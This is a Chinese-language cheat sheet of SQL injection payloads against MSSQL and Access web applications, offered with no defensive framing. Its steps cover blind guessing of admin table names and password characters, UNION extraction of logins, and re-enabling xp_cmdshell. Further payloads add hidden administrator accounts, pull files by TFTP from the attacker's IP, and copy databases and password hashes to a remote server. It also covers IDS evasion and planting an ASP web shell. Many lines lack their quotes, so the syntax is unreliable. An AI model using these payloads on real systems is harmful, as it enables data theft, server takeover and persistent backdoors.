1.判断有无注入点
; and 1=1 and 1=2

2.猜表 一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还有 and (select count(列名) from 表名)>0

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
猜长度还有 and (select top 1 len(username) from admin)>5

6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASCII码就OK.最后把结果再转换成字符.

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )--

UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

看服务器打的补丁=出错了打了SP4补丁
and 1=(select @@VERSION)--
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0<>(select user_name()--

看xp_cmdshell是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--

xp_cmdshell被删除,恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--

反向PING自己实验
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

加帐号
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--

创建一个虚拟目录E盘:
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--

访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

MSSQL也可以用联合查询
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)

爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交

得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image类型的表cmd
存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell dir
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
exec master..xp_servicecontrol start, schedule 启动服务
exec master..xp_servicecontrol start, server
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
如果被限制则可以。
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)

查询构造:
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 2 m7 [7 ` ~5 N1 a
select 123;--
;use master;--
:a or name like fff%;-- 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用户表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, admin--, password, 0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access数据库

枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个的读出,直到没有为止。
读字段是这样:
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名

[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
1、 开启远程数据库
基本语法
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
3.复制目标主机的整个数据库insert所有远程表到本地表。

基本语法:
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
select * from user_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
select * from user_database.dbo.syscolumns
复制数据库:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
复制哈希表(HASH) 登录密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
得到hash之后,就可以进行暴力破解。

遍历目录的方法: 先创建一个临时表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并存入temp表中
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
把路径写到表中去:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--

把数据库备份到网页目录:下载
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=- wscript.shell example -=-
declare @o int
exec sp_oacreate wscript.shell, @o out
exec sp_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject, @o out
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, readline, @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_oacreate scripting.filesystemobject, @o out
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_oamethod @f, writeline, NULL,
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>

declare @o int, @ret int
exec sp_oacreate speech.voicetext, @o out
exec sp_oamethod @o, register, NULL, foo, bar
exec sp_oasetproperty @o, speed, 150
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
waitfor delay 00:00:05

; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--

xp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree c: 返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整型字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面xp_dirtree相关联,字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c: 只要我们建表与存储过程返回的字段定义相等就能够执行!达到写表的效果,一步步得到我们想要的信息!